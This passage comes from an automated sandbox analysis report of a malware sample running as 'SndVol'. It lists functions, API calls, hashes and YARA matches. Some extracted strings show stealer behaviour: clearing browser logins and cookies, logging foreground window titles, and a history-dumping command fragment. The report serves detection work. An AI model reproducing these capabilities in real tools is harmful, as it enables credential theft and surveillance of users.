                                                                        • Instruction ID: acde39e991d7e7e31e040607f04e0d6845bde8cd9fb23b75a0167de8ceb38703
                                                                        • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                                        • Instruction Fuzzy Hash: DFC14971A00205AFEF249F799D40AAABBA8EF47314F1441AFD847B7352E770B941CB52
                                                                        Function 2917A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __alldvrm$_strrchr
                                                                        • String ID:
                                                                        • API String ID: 1036877536-0
                                                                        • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                        • Instruction ID: 7c605804ae3b9de22793fdc5282c7a44772a635054f7ab1700271bf399d1e4be
                                                                        • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                        • Instruction Fuzzy Hash: 93A11272E043879FE7158F1ACC91BEABBB1EF11358F1441A9E5959B2C1C7398B42C750
                                                                        Function 0446ADA1 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __alldvrm$_strrchr
                                                                        • String ID:
                                                                        • API String ID: 1036877536-0
                                                                        • Opcode ID: 741cce58a8cf82a0672f857150eda12be5e673117a3cfe047addc8b2d3899a0b
                                                                        • Instruction ID: ac2a3dd53fc38945ef84c58b092c22fe1ab974daed0b8910d2c55bcdcf8c699e
                                                                        • Opcode Fuzzy Hash: 741cce58a8cf82a0672f857150eda12be5e673117a3cfe047addc8b2d3899a0b
                                                                        • Instruction Fuzzy Hash: 76A16771A007869FEF25CE18C8817AEBFE1EF52300F14416FD596AB381D234B942C752
                                                                        Function 29186C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: e7a60b7917079c3dcadebd79adb76f0ea77f09f32186847e686c21fe58496bac
                                                                        • Instruction ID: 99d8f33ec80836703f10efd76841e1251ffd015e5d748f041a6abf9e7b0e1daf
                                                                        • Opcode Fuzzy Hash: e7a60b7917079c3dcadebd79adb76f0ea77f09f32186847e686c21fe58496bac
                                                                        • Instruction Fuzzy Hash: 88415432E00301BAFB145B7B9C45ADE3AB9FF513F8F009315F52896290DB3487036AA1
                                                                        Function 29172851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ac14e72ea5fc10fbe6282091c168931b219d9cf26955cdfbb2c3b885da7ccab
                                                                        • Instruction ID: 5d3570a4b4cf64f55a2a946526cb28b0b64719152ab0641ed93bbe8710b86bc0
                                                                        • Opcode Fuzzy Hash: 4ac14e72ea5fc10fbe6282091c168931b219d9cf26955cdfbb2c3b885da7ccab
                                                                        • Instruction Fuzzy Hash: 8A41D671A00705BFE3188F69CC40BDA7BF9EF88718F109A6AE155DB680D77297438790
                                                                        Function 29134CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,291A4F50), ref: 29134DB3
                                                                        • CreateThread.KERNEL32(00000000,00000000,?,291A4EF8,00000000,00000000), ref: 29134DC7
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 29134DD2
                                                                        • CloseHandle.KERNEL32(?,?,00000000), ref: 29134DDB
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3360349984-0
                                                                        • Opcode ID: be04fd7e56706e8f7c8863c99e443ba1c22f1a037d4332780a9ccb474982a9df
                                                                        • Instruction ID: b812d39746ca690cb62dcf3bc74e515384098a18e3ef399a73f4207db2e2137c
                                                                        • Opcode Fuzzy Hash: be04fd7e56706e8f7c8863c99e443ba1c22f1a037d4332780a9ccb474982a9df
                                                                        • Instruction Fuzzy Hash: DC41E371608344BFD744EB62CC54DAFB7FDAFA4318F80891DF496821D0DB24AB0A8666
                                                                        Function 2913C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • Cleared browsers logins and cookies., xrefs: 2913C130
                                                                        • [Cleared browsers logins and cookies.], xrefs: 2913C11F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                        • API String ID: 3472027048-1236744412
                                                                        • Opcode ID: ee9ac4125feb5882acdac96f3f9a1bd47dc0f739fb65f56030ffa8dbf04c47da
                                                                        • Instruction ID: 8b28fe547fef4d84fdfcb3a0ce246bf2dbbd180e4c3838a33e4aba14ff33d635
                                                                        • Opcode Fuzzy Hash: ee9ac4125feb5882acdac96f3f9a1bd47dc0f739fb65f56030ffa8dbf04c47da
                                                                        • Instruction Fuzzy Hash: 1731BE09B483C07EE60D6AB718A57EE7FA20FA304CFC4945DACC41B282D912474B836B
                                                                        Function 2913A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 2914C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 2914C5F2
                                                                          • Part of subcall function 2914C5E2: GetWindowTextLengthW.USER32(00000000), ref: 2914C5FB
                                                                          • Part of subcall function 2914C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 2914C625
                                                                        • Sleep.KERNEL32(000001F4), ref: 2913A5AE
                                                                        • Sleep.KERNEL32(00000064), ref: 2913A638
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Window$SleepText$ForegroundLength
                                                                        • String ID: [ $ ]
                                                                        • API String ID: 3309952895-93608704
                                                                        • Opcode ID: d58ee14e5b111649e02928692199b884a5f2ac1bb098ff0f626e23f2b2bae0da
                                                                        • Instruction ID: 576c62f776d43f8863d39cc62eac8b07f9c51df5d0e50efc0cc6a179ec540273
                                                                        • Opcode Fuzzy Hash: d58ee14e5b111649e02928692199b884a5f2ac1bb098ff0f626e23f2b2bae0da
                                                                        • Instruction Fuzzy Hash: C211AE31A042007BD658FB36CC529AE7BB86F60248FC0942DE456524E1EF25BB0A869A
                                                                        Function 29173AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d4f801ff77bb9c132a7d2be85cc607621134ee495e0275028ef9b4c00d304bba
                                                                        • Instruction ID: f8c81325c8b92c623408f63f24150b2ec76004e2d15400489bd2942f33ae901e
                                                                        • Opcode Fuzzy Hash: d4f801ff77bb9c132a7d2be85cc607621134ee495e0275028ef9b4c00d304bba
                                                                        • Instruction Fuzzy Hash: 1A01BCB2A4931B3EE614197A7CC1FE7672DDF55BBCB210726B520921C5DB608E038120
                                                                        Function 29173B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 19800cc8e89fd816b8948aa7a0fb9a28cb9fede799f226a6bd866e09ed30bfcd
                                                                        • Instruction ID: 491c403329eba7f96c33117d773315eee2aa86c4d101449d436979366d167349
                                                                        • Opcode Fuzzy Hash: 19800cc8e89fd816b8948aa7a0fb9a28cb9fede799f226a6bd866e09ed30bfcd
                                                                        • Instruction Fuzzy Hash: 7701DBF2A0A7177AEA24197A7CC0DD7626DAF513BC3214726F920521D4DF208E038120
                                                                        Function 2913A6B0 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,2913A788), ref: 2913A6E6
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,2913A788), ref: 2913A6F5
                                                                        • Sleep.KERNEL32(00002710,?,?,?,2913A788), ref: 2913A722
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,2913A788), ref: 2913A729
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                                        • String ID:
                                                                        • API String ID: 1958988193-0
                                                                        • Opcode ID: ce0a140aa89cd7acd9329428df2b57557b54929a97bfb80315daed84c6ac5a88
                                                                        • Instruction ID: 2c9bd66a8e60b76f413cfca5cca0506124336f86f7c1bca6acc8e75c4c434cfc
                                                                        • Opcode Fuzzy Hash: ce0a140aa89cd7acd9329428df2b57557b54929a97bfb80315daed84c6ac5a88
                                                                        • Instruction Fuzzy Hash: 37113A307442C4AEEA15A727D8C992E3BFBAF6125DFC00508E283465C6C63A6A06C769
                                                                        Function 291785E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,2917858D,00000000,00000000,00000000,00000000,?,291788B9,00000006,FlsSetValue), ref: 29178618
                                                                        • GetLastError.KERNEL32(?,2917858D,00000000,00000000,00000000,00000000,?,291788B9,00000006,FlsSetValue,2918F170,2918F178,00000000,00000364,?,29178367), ref: 29178624
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,2917858D,00000000,00000000,00000000,00000000,?,291788B9,00000006,FlsSetValue,2918F170,2918F178,00000000), ref: 29178632
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 3177248105-0
                                                                        • Opcode ID: 35a7d2f63dd01bc136b93d3a0a6b5915fad79b05578365b407bd6cc6f39da8f4
                                                                        • Instruction ID: e581bf167028b4659c890fdf4b38418977e60b3f2b2c2c1ce8bad7cffed0d755
                                                                        • Opcode Fuzzy Hash: 35a7d2f63dd01bc136b93d3a0a6b5915fad79b05578365b407bd6cc6f39da8f4
                                                                        • Instruction Fuzzy Hash: F5012432B02327BBD719996BDC88EE77769BF007A5B610561FA09D3140D724CA02C6E0
                                                                        Function 2914C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,2913A87E), ref: 2914C52F
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 2914C543
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 2914C568
                                                                        • CloseHandle.KERNEL32(00000000), ref: 2914C576
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleReadSize
                                                                        • String ID:
                                                                        • API String ID: 3919263394-0
                                                                        • Opcode ID: 72a5ac3ee7b38e6c21c7284463305745cfd288c272f6426c36363b2ece4a2249
                                                                        • Instruction ID: a3f63f83f731fbeafccdfc07927dd170af9ddf936763ff2bc944337f47ca78f3
                                                                        • Opcode Fuzzy Hash: 72a5ac3ee7b38e6c21c7284463305745cfd288c272f6426c36363b2ece4a2249
                                                                        • Instruction Fuzzy Hash: 6AF0C2B170220C7FF2052A26EC88FFF37ADEB866A8F00022AF901A2180DA254E065171
                                                                        Function 291698E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 291698FA
                                                                          • Part of subcall function 29169F32: ___AdjustPointer.LIBCMT ref: 29169F7C
                                                                        • _UnwindNestedFrames.LIBCMT ref: 29169911
                                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 29169923
                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 29169947
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                        • String ID:
                                                                        • API String ID: 2633735394-0
                                                                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                        • Instruction ID: 0572c86d189708bcbb2ed32042fa56d8b135931ffbc789a79dee585790c7a594
                                                                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                        • Instruction Fuzzy Hash: 6201E932800109BBCF165F56CD01EDA3BBAFF59758F018019FA5865134C336E672DBA0
                                                                        Function 2914C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 2914C286
                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 2914C299
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 2914C2C4
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 2914C2CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandleOpenProcess
                                                                        • String ID:
                                                                        • API String ID: 39102293-0
                                                                        • Opcode ID: 41ac2aa9e359f4fdc821ff7c415bba42612f564d539eec33897d2d94eaf81773
                                                                        • Instruction ID: a0e34e123c8f9de940eb81063f41614b6e688c7e01c44f471d9b1cc563bc7adc
                                                                        • Opcode Fuzzy Hash: 41ac2aa9e359f4fdc821ff7c415bba42612f564d539eec33897d2d94eaf81773
                                                                        • Instruction Fuzzy Hash: 2A01F931B006196BE30176EBDC4EFE7B67CDB88799F010166FA48D3181EEA59F424672
                                                                        Function 0445A600 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0445A617
                                                                          • Part of subcall function 0445AC4F: ___AdjustPointer.LIBCMT ref: 0445AC99
                                                                        • _UnwindNestedFrames.LIBCMT ref: 0445A62E
                                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 0445A640
                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 0445A664
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                        • String ID:
                                                                        • API String ID: 2633735394-0
                                                                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                        • Instruction ID: 3bb5f3cc66a32cd5b28a74431fb16335ba721289d66bb75947e3526beebd55d8
                                                                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                        • Instruction Fuzzy Hash: A901D732000109BBDF126F56DC04EDE3BBAEF48758F05421AFE5875132D736E861ABA4
                                                                        Function 2914941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSystemMetrics.USER32(0000004C), ref: 2914942B
                                                                        • GetSystemMetrics.USER32(0000004D), ref: 29149431
                                                                        • GetSystemMetrics.USER32(0000004E), ref: 29149437
                                                                        • GetSystemMetrics.USER32(0000004F), ref: 2914943D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 4116985748-0
                                                                        • Opcode ID: 8970213b3dcdfa612d7b43e0835ad8622cddb5df7116d9dd338313e9e4980886
                                                                        • Instruction ID: 64224343bb9b2d75c18cfac418dae3660032a1fc98c1ebf3d15dea6205bf7465
                                                                        • Opcode Fuzzy Hash: 8970213b3dcdfa612d7b43e0835ad8622cddb5df7116d9dd338313e9e4980886
                                                                        • Instruction Fuzzy Hash: 00F0C2A1F003155BD341EE76CC44A1B6AD5BBD8664F14593FE60D8B285EEB8CD068BC1
                                                                        Function 29168FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 29168FB1
                                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 29168FB6
                                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 29168FBB
                                                                          • Part of subcall function 2916A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 2916A4CB
                                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 29168FD0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                        • String ID:
                                                                        • API String ID: 1761009282-0
                                                                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                        • Instruction ID: 2a4569dc2b7de5a17de686eb5969dc872f71e77a043a647c4a5d7708e5a9e33b
                                                                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                        • Instruction Fuzzy Hash: 67C04C06C00181753CD66EBF1D091CF43561E722CC784F4D68950574B7DA1503BB5832
                                                                        Function 04459CCE Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 04459CCE
                                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 04459CD3
                                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 04459CD8
                                                                          • Part of subcall function 0445B1D7: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0445B1E8
                                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 04459CED
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                        • String ID:
                                                                        • API String ID: 1761009282-0
                                                                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                        • Instruction ID: 6327617f8331fdbe5281cd0282a5faad2538e553e11a88d4beb0325f2395a035
                                                                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                        • Instruction Fuzzy Hash: 39C04CD8440182A47EA33EB622442AE23A4BD426CDB8024CFDC531B237DD06300AE233
                                                                        Function 29172CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 29172D3D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorHandling__start
                                                                        • String ID: pow
                                                                        • API String ID: 3213639722-2276729525
                                                                        • Opcode ID: 820ca140ae04dab488e868f07b1419c6bf52c53b1681e5888bd06159019f6f37
                                                                        • Instruction ID: 11bb90674fa422ab64e9746a6735a396675091520ad13d132d94f240e6273703
                                                                        • Opcode Fuzzy Hash: 820ca140ae04dab488e868f07b1419c6bf52c53b1681e5888bd06159019f6f37
                                                                        • Instruction Fuzzy Hash: F1517C65E0870B96D70E7713C9017E937F4AF40798F208D6AE0D5822E9EB3487D79B86
                                                                        Function 0446C159 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __fassign
                                                                        • String ID: PkGNG
                                                                        • API String ID: 3965848254-263838557
                                                                        • Opcode ID: df6090bc8f26b7e29a48799c2f63ef8664aacbe2c579135c1419eb37ea41631a
                                                                        • Instruction ID: 9b8ced55a270b11454a23f0c5e7cf7ecca230e1514b42c1e10122db789c0a633
                                                                        • Opcode Fuzzy Hash: df6090bc8f26b7e29a48799c2f63ef8664aacbe2c579135c1419eb37ea41631a
                                                                        • Instruction Fuzzy Hash: 5951A171E00249AFDF10CFA8D884AEEBBB4EF09300F14456BE956F7291E670A951CB61
                                                                        Function 0443CDC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _memcmp_wcslen
                                                                        • String ID: ?
                                                                        • API String ID: 1846113162-1684325040
                                                                        • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                                        • Instruction ID: ef99701b99918069d3b42d1641c360622645a651551b43329d0dda391b488c7a
                                                                        • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                                        • Instruction Fuzzy Hash: D2419872508315EBDB20EF70DC8899BB7ECEB48B56F00082BF545D21A1E770D944C796
                                                                        Function 2913404C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 29134066
                                                                          • Part of subcall function 2914BA09: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,29196478,2913D248,.vbs,?,?,?,?,?,291A52F0), ref: 2914BA30
                                                                          • Part of subcall function 291485A3: CloseHandle.KERNEL32(291340F5,?,?,291340F5,29195E84), ref: 291485B9
                                                                          • Part of subcall function 291485A3: CloseHandle.KERNEL32(29195E84,?,?,291340F5,29195E84), ref: 291485C2
                                                                          • Part of subcall function 2914C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,2913A87E), ref: 2914C52F
                                                                        • Sleep.KERNEL32(000000FA,29195E84), ref: 29134138
                                                                        Strings
                                                                        • /sort "Visit Time" /stext ", xrefs: 291340B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                        • String ID: /sort "Visit Time" /stext "
                                                                        • API String ID: 368326130-1573945896
                                                                        • Opcode ID: 94e9d53e71ed688b6b5716c9dcdea12c73c2371c737d55d340a32199f12a8bcf
                                                                        • Instruction ID: 2d70dd873de623265aaa8c5c063f64e7aef3cae85bb33d4d02ef225b9f06436d
                                                                        • Opcode Fuzzy Hash: 94e9d53e71ed688b6b5716c9dcdea12c73c2371c737d55d340a32199f12a8bcf
                                                                        • Instruction Fuzzy Hash: C6319531A101187BDB58E7B7DC959EDB779AFA0208F809059D50AA71D0EF206F4FCA94
                                                                        Function 29181BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
